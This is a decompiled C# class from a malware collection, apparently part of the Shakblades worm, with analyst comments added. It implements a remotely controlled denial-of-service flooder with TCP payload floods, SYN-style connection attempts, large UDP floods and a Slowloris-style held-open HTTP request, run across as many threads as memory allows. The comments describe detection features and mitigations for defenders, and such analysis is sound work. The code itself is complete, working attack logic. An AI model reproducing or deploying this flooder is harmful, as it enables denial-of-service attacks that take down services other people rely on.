MalwareSourceCode/MSIL/Worm/Win32/S/Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f/Ј໺঳ᝮᢶᯀ.cs
2022-08-18 06:28:56 -05:00


// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.Ј໺঳ᝮᢶᯀ
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
using System;
using System.Net.Sockets;
using System.Text;
using System.Threading;
namespace Ҧ߲ʽ
{
internal class Ј\u0EFA\u09B3ᝮᢶᯀ
{
// Analyst notes: static configuration shared by all worker threads of this
// traffic-generation class. Every field below is assigned by the seven-parameter
// setup method further down; names are obfuscated, roles are inferred from use.
// Selected traffic mode (value of the nested enum at the end of the class).
private static Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C Ç\u09F5ࠍ\u0082;
// Run flag: the worker loops keep going only while this is true.
private static bool \u1AA0;
// Remote host: first argument of every Connect/BeginConnect call and the value of the "Host:" header.
private static string ɀ\u0F30;
// Remote port: second argument of every Connect/BeginConnect call.
private static int \u0EEBΝᝧԠ;
// Number of worker threads the spawner tries to start (loop bound in the spawner).
private static int \u1087;
// Pause in milliseconds between rounds (passed to Thread.Sleep after each mode's round).
private static int ɱ\u1A8Aᙦ;
// Upper bound on sends per round in the TCP-send and UDP modes (compared against the local counter).
private static int \u0027;
// Object of an obfuscated project type; the field name is not printable in this listing.
// Its boolean member \u0557 is tested in every loop condition — presumably a
// "controller still alive/connected" signal; confirm against that type's definition.
private static \u07F6\u181Fᒸৃ ;
// Analyst notes: table of 28 bracketed, encoded strings. The HTTP request builder
// picks one index at random, runs the entry through the external decoder
// \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ(..., true) and uses the result as the second part of the
// User-Agent header. The plaintext is not visible in this file; the decoded
// values are candidate network indicators once recovered with the sample's decoder.
// Entries 11-20 repeat the 2nd entry and entries 21-28 repeat the 3rd entry, each
// with a single digit appended after the encoded text.
private static string[] \u0942 = new string[28]
{
"[W5aioKOUp5yVn5huU4CGfHgznRO9U2lhY25Tipyhl6KqplOBh1w=]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==]",
"[OV6Ac3p9dmF5gH92MWRUYT5GRkFBQGZkQEI/QToxX3aFV4OAf4VARD9BMV5eYUBDP0ExOXSAfhE/sm2BcoV6c312TDFYgIB4fXZzgIVAQz9CTDF5hYWBS0BAiIiIP3iAgHh9dj90gH5Ac4CFP3mFfn06]",
"[bHZ/bjE5aBE/sm16f19lTDFmOg==]",
"[OXSAfoFyhXpzfXZMMV5kWlYxSD9BTBE/sm0xaHp/dYCIhDFfZTFGP0JMMXN4d4U6MQ==]",
"[OXSAfoFyhXpzfXZMMV4RP7JtZFpWMUc/QUwxaHp/REM6]",
"[OWlCQkwxZkwxXXp/hokxQz9FP0M+QzF6RklHTDF2fz5mZEwRP7JtMX5CSToxWHZ0fIBAQ0FBQkFCREIxX3aFhHRygXZHQEc/QUI=]",
"[OWlCQkwxZkwxXXp/hokxekdJR0wxdn8+ZmQRP7JtTDGDh0tBP0o/RDoxWHZ0fIBAQ0FBQkFJQUI=]",
"[OWSGf2BkMUY/STGEhn9FhkwRP7JtMWY6MWCBdoNyMUY/QTFsdn9u]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo0]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo1]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo2]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo3]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo4]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo5]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo6]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo7]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo8]",
"[W4CUlpyhp6Kmm25TiG5TfKGnmJ9TgJSWU4KGU4tTZGNhZ25TmKFgiIYznRO9blOlqW1kYWyVaFxTepiWnqJiZWNja2NmZWlkbFN5nKWYmaKrYmZhY5Vo9]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==0]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==1]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==2]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==3]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==4]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==5]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==6]",
"[W4qcoZeiqqZuU4huU4qcoZeiqqZTgYdTaGFkblOYoWCIhm5TpaltZGFrYWNhaDOdE71cU3qYlp6iYmVjY2ljamZkU3mcpZiZoqtiZGFoYWNhaFN5n6KWnmJjYWphZ2FkUw==7]"
};
// Analyst notes: table of 10 bracketed, encoded strings. The HTTP request builder
// picks one index at random, decodes it with \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ(..., true) and
// uses the result as the first part of the User-Agent header, followed by a
// space and a decoded entry from the 28-element table. Plaintext is not visible
// in this file. The entries fall into three groups by shared prefix
// ("udvm…", "JUdS…", "J0g9…").
private static string[] \u0669ѹᏲբ݅ = new string[10]
{
"[udvm1djYbAzPpc2bn5qcjA==]",
"[udvm1djYbAzPpc2bn5qdjA==]",
"[udvm1djYbAzPpc2bn5qijA==]",
"[JUdSQURE2DvBDTkHDAYI+A==]",
"[JUdSQURE2DvBDTkHDAYIEPg=]",
"[JUdSQURE2DvBDTkHDQYI+A==]",
"[J0g9SjnYO8ENBxEGCwv4]",
"[J0g9SjnYO8ENBxEGCPg=]",
"[J0g9SjnYO8ENBxAGEQj4]",
"[J0g9SjnYO8ENBxEGEAj4]"
};
// Read-only accessor for the currently configured traffic mode.
public static Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C \u083A\u0606ᓙ\u0F03 => Ј\u0EFA\u09B3ᝮᢶᯀ.Ç\u09F5ࠍ\u0082;
// Returns a text label for the configured mode by passing a per-mode literal to the
// external decoder \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ(..., true); returns null for any other enum value.
// Three literals are opaque encoded blobs; the second mode passes the literal
// "[SYN]". What the decoder returns for each is not visible in this file —
// presumably the mode name reported back to the operator; confirm against the decoder.
public static string \u0E4BᡐḼ
{
get
{
switch (Ј\u0EFA\u09B3ᝮᢶᯀ.Ç\u09F5ࠍ\u0082)
{
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0307جᢦ౯᥏\u0DB2:
return \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("Eb314QAADQ==", true);
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0E86ᐪᬞ\u0F0Dਞ:
return \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("[SYN]", true);
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0C8D\u0AC6ᩬ\u1A5Fᔅ:
return \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("Er314QABDQ==", true);
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.ľ\u1C99\u1B67șՔᘱ݆ߜ:
return \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("ECksNL314QApLC8mMA==", true);
default:
return (string) null;
}
}
}
// Read-only accessor for the run flag (true between the start and stop calls).
public static bool ͕IJ\u0ADFধ => Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0;
// Setup method: stores one task description in the static fields and clears the run flag.
// Parameter roles, inferred from how the fields are used elsewhere in this class:
//   _param0 - traffic mode (nested enum)
//   _param1 - remote host (Connect argument and "Host:" header value)
//   _param2 - remote port
//   _param3 - number of worker threads to start
//   _param4 - maximum sends per round (TCP-send and UDP modes)
//   _param5 - pause between rounds, in milliseconds
//   _param6 - object whose boolean member \u0557 gates the loops (obfuscated project type)
// Because everything is static, only one task can be configured at a time.
public static void ޚ\u1A8E\u1361\u0B12\u007F\u05EB(
Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C _param0,
string _param1,
int _param2,
int _param3,
int _param4,
int _param5,
\u07F6\u181Fᒸৃ _param6)
{
Ј\u0EFA\u09B3ᝮᢶᯀ.Ç\u09F5ࠍ\u0082 = _param0;
Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30 = _param1;
Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ = _param2;
Ј\u0EFA\u09B3ᝮᢶᯀ.\u1087 = _param3;
Ј\u0EFA\u09B3ᝮᢶᯀ.\u0027 = _param4;
Ј\u0EFA\u09B3ᝮᢶᯀ.ɱ\u1A8Aᙦ = _param5;
// Target field name is not printable in this listing (decompiler/extraction artefact).
Ј\u0EFA\u09B3ᝮᢶᯀ. = _param6;
Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 = false;
}
// Start: sets the run flag and launches the spawner on its own thread, so the caller returns immediately.
public static void ŝʊ()
{
Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 = true;
new Thread(new ThreadStart(Ј\u0EFA\u09B3ᝮᢶᯀ.șȓ)).Start();
}
// Stop: clears the run flag; worker loops observe it on their next condition check.
public static void ϊ() => Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 = false;
// Spawner: starts up to the configured number of worker threads, each running the
// worker loop as a background thread. The only limit applied is memory exhaustion:
// on OutOfMemoryException the configured count is overwritten with index - 1 and
// spawning stops. On an infected host this shows up as a sudden, large thread
// count inside a single process.
private static void șȓ()
{
for (int index = 0; index < Ј\u0EFA\u09B3ᝮᢶᯀ.\u1087; ++index)
{
try
{
new Thread(new ThreadStart(Ј\u0EFA\u09B3ᝮᢶᯀ.\u16FA))
{
IsBackground = true
}.Start();
}
catch (OutOfMemoryException ex)
{
Ј\u0EFA\u09B3ᝮᢶᯀ.\u1087 = index - 1;
break;
}
}
}
// Worker loop, one instance per worker thread. Repeats rounds of traffic toward the
// configured host/port for as long as the run flag is set and the gate member
// \u0557 of the stored object is true. Each round is shaped by the configured
// mode and is followed by the configured pause. All sockets are IPv4 only
// (AddressFamily.InterNetwork). Exceptions are swallowed throughout.
//
// Traffic characteristics per mode, as visible in this method (useful for
// network detection and rate-limit tuning on the receiving side):
//   1st enum member - TCP connect, one block of random bytes, close.
//   2nd enum member - TCP connection attempt started asynchronously and torn down
//                     after 100 ms; no application data is sent.
//   3rd enum member - UDP datagrams of random bytes to one host/port, 1 ms apart.
//   4th enum member - TCP connection kept open, the same HTTP header block re-sent
//                     every 2000 ms.
private static void \u16FA()
{
// Sends performed in the current round; reset to 0 at the end of every round.
int num = 0;
while (Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 && Ј\u0EFA\u09B3ᝮᢶᯀ..\u0557)
{
switch (Ј\u0EFA\u09B3ᝮᢶᯀ.Ç\u09F5ࠍ\u0082)
{
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0307جᢦ౯᥏\u0DB2:
// TCP mode: connect, send one random payload from the TCP payload generator, close.
Socket socket1 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
socket1.Blocking = false;
while (num < Ј\u0EFA\u09B3ᝮᢶᯀ.\u0027 && Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0)
{
if (Ј\u0EFA\u09B3ᝮᢶᯀ..\u0557)
{
try
{
socket1.Connect(Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ);
socket1.Send(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0097\u0E00ᰬអᙲ\u0CFE੮ᆳଅ());
socket1.Close();
socket1 = (Socket) null;
}
catch
{
// Any failure ends the inner loop for this round.
socket1.Close();
break;
}
++num;
Thread.Sleep(1);
}
else
break;
}
Thread.Sleep(Ј\u0EFA\u09B3ᝮᢶᯀ.ɱ\u1A8Aᙦ);
break;
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0E86ᐪᬞ\u0F0Dਞ:
// Connection-attempt mode: one new socket per round, asynchronous connect whose
// result is never read (the callback is empty), then disconnect/close after 100 ms.
// The receiving side sees connection attempts with no payload.
Socket socket2 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
socket2.Blocking = false;
try
{
socket2.BeginConnect(Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ, new AsyncCallback(Ј\u0EFA\u09B3ᝮᢶᯀ.\u1759ໞ\u060Fᣊ\u1B5B), (object) null);
}
catch
{
}
Thread.Sleep(100);
try
{
if (socket2.Connected)
socket2.Disconnect(false);
socket2.Close();
}
catch
{
}
Thread.Sleep(Ј\u0EFA\u09B3ᝮᢶᯀ.ɱ\u1A8Aᙦ);
break;
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.\u0C8D\u0AC6ᩬ\u1A5Fᔅ:
// UDP mode: one socket per round, bound to the remote endpoint with Connect, then
// up to the configured number of random datagrams from the UDP payload generator.
Socket socket3 = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
socket3.Blocking = false;
// Decompiler artefact: socket4 is only ever assigned null.
Socket socket4;
try
{
socket3.Connect(Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ);
while (num < Ј\u0EFA\u09B3ᝮᢶᯀ.\u0027 && Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0 && Ј\u0EFA\u09B3ᝮᢶᯀ..\u0557)
{
socket3.Send(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0738Зܫ\u0837ᚖųᮝ());
++num;
Thread.Sleep(1);
}
socket3.Close();
socket4 = (Socket) null;
}
catch
{
// This break leaves the switch without the pause and without going through the
// "num = 0" line below differently: control still falls to "num = 0" after the switch.
socket3.Close();
socket4 = (Socket) null;
break;
}
Thread.Sleep(Ј\u0EFA\u09B3ᝮᢶᯀ.ɱ\u1A8Aᙦ);
break;
case Ј\u0EFA\u09B3ᝮᢶᯀ.ք\u0609ǟ\u175C.ľ\u1C99\u1B67șՔᘱ݆ߜ:
// HTTP mode: one blocking TCP connection per round; the header block from the
// HTTP request builder is sent once and then again every 2000 ms while the socket
// reports Connected and both stop conditions allow it. No response is ever read.
// Server-side header/idle timeouts and per-source connection caps bound the
// effect of connections held open this way.
Socket socket5 = (Socket) null;
try
{
socket5 = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
socket5.Connect(Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0EEBΝᝧԠ);
socket5.Send(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0826Ꮽ\u0B72\u1AC1ଲ());
while (socket5.Connected)
{
if (Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0)
{
if (Ј\u0EFA\u09B3ᝮᢶᯀ..\u0557)
{
socket5.Send(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0826Ꮽ\u0B72\u1AC1ଲ());
Thread.Sleep(2000);
}
else
break;
}
else
break;
}
}
catch
{
socket5.Close();
}
Thread.Sleep(Ј\u0EFA\u09B3ᝮᢶᯀ.ɱ\u1A8Aᙦ);
break;
}
num = 0;
}
// Reached when the outer loop ends. If the run flag is still set, the loop ended
// because the gate member went false; the stop method is then called to clear the flag.
if (!Ј\u0EFA\u09B3ᝮᢶᯀ.\u1AA0)
return;
Ј\u0EFA\u09B3ᝮᢶᯀ.ϊ();
}
// Empty completion callback handed to BeginConnect in the connection-attempt mode.
// EndConnect is never called, so the outcome of the connect is never examined.
private static void \u1759ໞ\u060Fᣊ\u1B5B(IAsyncResult _param0)
{
}
// UDP payload generator: returns a buffer of random bytes whose length is drawn
// from Random.Next(1470, 65507), i.e. 1470 to 65506 bytes. The content carries no
// fixed signature; detection has to rely on size and rate. Most of this size range
// is larger than a common 1500-byte MTU, so fragmented UDP toward a single
// host/port is the likely on-wire appearance (depends on the path MTU).
private static byte[] \u0738Зܫ\u0837ᚖųᮝ()
{
Random random = new Random();
byte[] buffer = new byte[random.Next(1470, 65507)];
random.NextBytes(buffer);
return buffer;
}
// TCP payload generator: returns a buffer of random bytes whose length is drawn
// from Random.Next(1470, 65535), i.e. 1470 to 65534 bytes. As with the UDP
// generator, the content has no fixed byte pattern to match on.
private static byte[] \u0097\u0E00ᰬអᙲ\u0CFE੮ᆳଅ()
{
Random random = new Random();
byte[] buffer = new byte[random.Next(1470, (int) ushort.MaxValue)];
random.NextBytes(buffer);
return buffer;
}
// HTTP request builder: returns the ASCII bytes of a header block for "GET /".
// Observable properties of the generated request (candidate detection features):
//   - request line is always "GET / HTTP/1.1";
//   - "Host:" carries the configured remote host;
//   - "User-Agent:" is two decoded table entries joined by a single space;
//   - "Content-Length:" is a random 1-999 although a GET is sent and no body follows;
//   - a non-standard "X-a:" header carries a random 1-9999;
//   - the last header is written with Append, not AppendLine, so the block ends
//     without a line terminator and without the empty line that ends HTTP headers.
// The caller re-sends this block on the same connection, so the request is never
// completed from the server's point of view; this resembles a slow-header
// (Slowloris-style) hold-open pattern.
private static byte[] \u0826Ꮽ\u0B72\u1AC1ଲ()
{
Random random = new Random();
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.AppendLine("GET / HTTP/1.1");
stringBuilder.AppendLine("Host: " + Ј\u0EFA\u09B3ᝮᢶᯀ.ɀ\u0F30);
stringBuilder.AppendLine("User-Agent: " + \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0669ѹᏲբ݅[random.Next(0, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0669ѹᏲբ݅.Length - 1)], true) + " " + \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ(Ј\u0EFA\u09B3ᝮᢶᯀ.\u0942[random.Next(0, Ј\u0EFA\u09B3ᝮᢶᯀ.\u0942.Length - 1)], true));
stringBuilder.AppendLine("Content-Length: " + random.Next(1, 1000).ToString());
stringBuilder.AppendLine("X-a: " + random.Next(1, 10000).ToString());
stringBuilder.Append("Connection: keep-alive");
return Encoding.ASCII.GetBytes(stringBuilder.ToString());
}
// Traffic modes. Member names are obfuscated; the roles below come from the
// matching case labels in the worker loop.
public enum ք\u0609ǟ\u175C
{
// TCP connect + one random payload.
\u0307جᢦ౯᥏\u0DB2,
// TCP connection attempt torn down after 100 ms (label literal "[SYN]").
\u0E86ᐪᬞ\u0F0Dਞ,
// UDP random datagrams.
\u0C8D\u0AC6ᩬ\u1A5Fᔅ,
// HTTP header block re-sent on a held-open connection.
ľ\u1C99\u1B67șՔᘱ݆ߜ,
}
}
}